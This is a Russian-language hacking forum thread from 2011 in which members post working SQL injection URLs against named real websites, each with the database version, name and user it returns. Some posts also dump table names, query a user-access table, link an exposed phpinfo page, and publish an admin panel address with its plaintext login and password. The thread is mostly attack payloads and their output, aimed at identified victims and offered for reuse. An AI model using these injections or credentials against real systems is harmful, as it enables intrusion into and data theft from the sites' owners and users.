HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14391  
Старый 11.11.2011, 13:45
g0rm0n
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 0
По умолчанию

Код:
Code:
http://www.gameplanpros.com/v.php?id=8+union+select+1,2,3,4,5,6,7,8,9,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,11,12,13--+
5.1.58-community-log:gamepla5_gameplan:gamepla5_gpweb@localhost

Код:
Code:
http://www.avk-bearing.ru/n.php?id=8+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5--+
5.1.41-log:nowhere_db:nowhere_mysql@10.1.82.94

Код:
Code:
http://www.mukeshmarwah.net/b.php?id=8+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7
5.0.92-log:mm-1967694:mukesh@172.16.0.220.

Код:
Code:
http://www.sirohibazar.com/b.php?id=-8+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5,6
5.0.22-community-nt:news:news@localhost

Код:
Code:
http://bergtouren.hohmann-edv.de/bergwanderungen/b.php?ID=-8+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6,7--+
5.1.47-log:ilo01247-bergtouren:ilo01247@localhos
 
Ответить с цитированием

  #14392  
Старый 11.11.2011, 13:48
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от None  
http://board.bizua.com.ua/index.php?id_typ=276+union+select+1,2,3,4,5,6,CONC AT_WS(0x3a,user(),version(),DATABASE()),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
FIDEPP_SE1@LOCALHOST:5.2.4-MARIADB:FIDEPP_SE1
 
Ответить с цитированием

  #14393  
Старый 11.11.2011, 18:55
Albseera
Guest
Сообщений: n/a
Провел на форуме:
356

Репутация: -1
По умолчанию

Помогите разобраться с этим монстром , никак не получается раздобыть таблицы :

http://ch eck-e ngine.ru/support.php?idt=-1+UNION+SELECT+1,version(),3,4--

4.0.27-log

Неужели кроме брута здесь никак ?
 
Ответить с цитированием

  #14394  
Старый 12.11.2011, 02:31
Drager
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 32
По умолчанию

loongson.cn

www.loongson.cn

[PR = 5]

[тИЦ = 10]

Код:
Code:
http://www.loongson.cn/solutions_two.php?id=45+AND+1=2+UNION+SELECT+1,2,3,4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE())+--+
или
http://www.loongson.cn/product_info.php?id=31+AND+1=2+UNION+SELECT+1,2,3,4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE())+--+
hongjun@localhost-5.0.51a-24+lenny2-loongson_www_cn

Из интересного: у администратора мощный пароль =]

Кстати, знаете что такое Loongson? Ссылка: ru.wikipedia.org/wiki/Loongson
 
Ответить с цитированием

  #14395  
Старый 12.11.2011, 13:28
Drager
Guest
Сообщений: n/a
Провел на форуме:
2371

Репутация: 32
По умолчанию

www.heroworld.net

[PR=4]

[тИЦ=10]

Код:
Code:
http://www.heroworld.net/news.php?id=957+AND+1=2+UNION+SELECT+1,2,3,4,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE()),6,7,8,9,10+--+
ghevilp@localhost-5.1.53-heroworld_top
 
Ответить с цитированием

  #14396  
Старый 12.11.2011, 16:41
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

тиЦ 325 PR 5

Код:
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,15,16+--+
test77@localhost:test77_cl_spbnews_ru:5.0.67

Таблицы

Код:
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat%28table_name%29,15,16+FROM+INFORMATION_SCHEMA.TABLES--
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]albums_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]albums_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]albums_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]albums_fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]albums_ru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ban_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ban_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ban_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ban_fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ban_ru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]bantyp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]carousel_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]carousel_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]carousel_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]carousel_fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]carousel_ru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catalog_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catalog_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catalog_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catalog_fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catalog_ru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catitem_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catitem_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catitem_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catitem_fr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]catitem_ru[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_advert_pages[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_advert_referers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_cache_advert_cost[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_cache_destinations[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_cache_referers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_cache_robots[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_cache_servers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_config[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_counter[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_counter_total[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_filteritems[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_filterlist[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_filterrelation[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_goodies[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_googlecache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_ipalias[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_languages[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_log[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_openstat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_restorepassword[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_rss_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_rss_rebuild[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_size[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_slide_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_slides[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_subnets[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_today[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_users[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_users_access[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_users_sessions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]cns_who_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]contact_de[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]contact_en[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]contact_es[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]contact_fr[/COLOR][/COLOR
Код:
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat%28id_user,0x3a,report%29,15,16+from+cns_users_access--
php info - http://www.ladogaspb.ru/phpinfo.php
 
Ответить с цитированием

  #14397  
Старый 12.11.2011, 23:23
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

SQLinj In SQLinj

Код:
Code:
http://erfen.ru/antispam/region.php?num=9631234567+and+1=2+union+select+1,2+--+
Встроенный запрос!

Код:
Code:
http://erfen.ru/antispam/region.php?num=9631234567 and 1=2 union select '2 and 1=3 union select concat_ws(0x3b,version(),user(),database()) -- ',0 --+
 
Ответить с цитированием

  #14398  
Старый 13.11.2011, 13:20
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от None  
www.maginfo.com.ua/cat.php?id=-1+union+select+table_name+from+information_schema. tables--
Boolean Подскажи, для чего используют встроенный запрос?
 
Ответить с цитированием

  #14399  
Старый 13.11.2011, 19:17
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Код:
Code:
http://www.captainsofcrush.ru/grippers/info.php?id=-18+union+select+1,photo2,3,4,5,6,7,8+FROM+catalog+--+
ТИЦ - 30

PR - 3

Код:
Code:
http://www.povituha.ru/news.php?id=9999999+union+select+1,2,database,4,5,6+--+
ТИЦ - 50

PR - 3

Код:
Code:
http://dizelbox.net/news.php?id=-1+union+select+1,database%28%29,3,4,5+--+
ТИЦ - 0

PR - 3

админка

Код:
Code:
http://dizelbox.net/adm/indexx.php
admin:zx89pe531yz

Код:
Code:
marketing.rbc.ua/file.php?id=-1+union+select+CONCAT_WS(0x3a,user(),version(),DATABASE()),2,3+--+
research@localhost:5.0.91:rbc_research_new

ТИЦ -140

PR - 5
 
Ответить с цитированием

  #14400  
Старый 14.11.2011, 09:09
g0rm0n
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 0
По умолчанию

Код:
Code:
http://www.feldgrau.com/articles.php?ID=-32+union+select+1,2,3,4,5,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,7,8--+
5.0.51a-3ubuntu5.8:feldgrau:feldgrau@localhost

Код:
Code:
http://www.choices.edu/resources/detail.php?id=-32+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
4.1.22-log:Choices:choices@skylark.services.brown.edu
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ